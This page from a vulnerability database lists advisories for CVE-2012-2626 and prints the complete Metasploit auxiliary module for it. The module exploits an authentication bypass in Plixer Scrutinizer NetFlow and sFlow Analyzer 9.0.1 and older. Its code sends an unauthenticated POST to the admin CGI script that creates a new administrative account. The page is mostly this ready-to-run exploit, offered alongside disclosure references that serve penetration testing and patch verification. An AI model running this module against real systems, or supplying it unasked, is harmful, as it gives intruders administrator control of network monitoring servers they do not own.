| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| Scrutinizer NetFlow / sFlow Analyzer 9.0.1 XSS / Bypass / File Upload | 30 Jul 201200:00 | – | zdt | |
| CVE-2012-2626 | 30 Jul 201200:00 | – | circl | |
| Plixer Scrutinizer NetFlow and sFlow Analyzer HTTP Authentication Bypass (CVE-2012-2626) | 20 Feb 201300:00 | – | checkpoint_advisories | |
| CVE-2012-2626 | 31 Jul 201210:00 | – | cve | |
| CVE-2012-2626 | 31 Jul 201210:00 | – | cvelist | |
| Plixer Scrutinizer NetFlow and sFlow Analyzer HTTP Authentication Bypass | 7 Aug 201217:13 | – | metasploit | |
| CVE-2012-2626 | 31 Jul 201210:45 | – | nvd | |
| Plixer / Dell SonicWALL Scrutinizer < 9.5.0 Multiple Vulnerabilities - Active Check | 2 Aug 201200:00 | – | openvas | |
| Scrutinizer NetFlow / sFlow Analyzer 9.0.1 XSS / Bypass / File Upload | 29 Jul 201200:00 | – | packetstorm | |
| Authentication flaw | 31 Jul 201210:45 | – | prion |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Plixer Scrutinizer NetFlow and sFlow Analyzer HTTP Authentication Bypass',
'Description' => %q{
This will add an administrative account to Scrutinizer NetFlow and sFlow Analyzer
without any authentication. Versions such as 9.0.1 or older are affected.
},
'References' => [
[ 'CVE', '2012-2626' ],
[ 'OSVDB', '84318' ],
[ 'URL', 'https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt' ]
],
'Author' => [
'MC',
'Jonathan Claudius',
'Tanya Secker',
'sinn3r'
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2012-07-27'
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The path to the admin CGI script', '/cgi-bin/admin.cgi']),
OptString.new('USERNAME', [true, 'The username for your new account']),
OptString.new('PASSWORD', [true, 'The password for your new account'])
]
)
end
def run
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'tool' => 'userprefs',
'newUser' => datastore['USERNAME'],
'pwd' => datastore['PASSWORD'],
'selectedUserGroup' => '1'
}
})
if !res
print_error('No response from server')
return
end
begin
require 'json'
rescue LoadError
print_error('Json is not available on your machine')
return
end
begin
j = JSON.parse(res.body)
if j['error']
print_error(j['error'])
elsif j['new_user_id']
print_good("User created. ID = #{j['new_user_id']}")
else
print_status('Unexpected response:')
print_status(j.to_s)
end
rescue JSON::ParserError
print_error('Unable to parse JSON')
print_line(res.body)
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation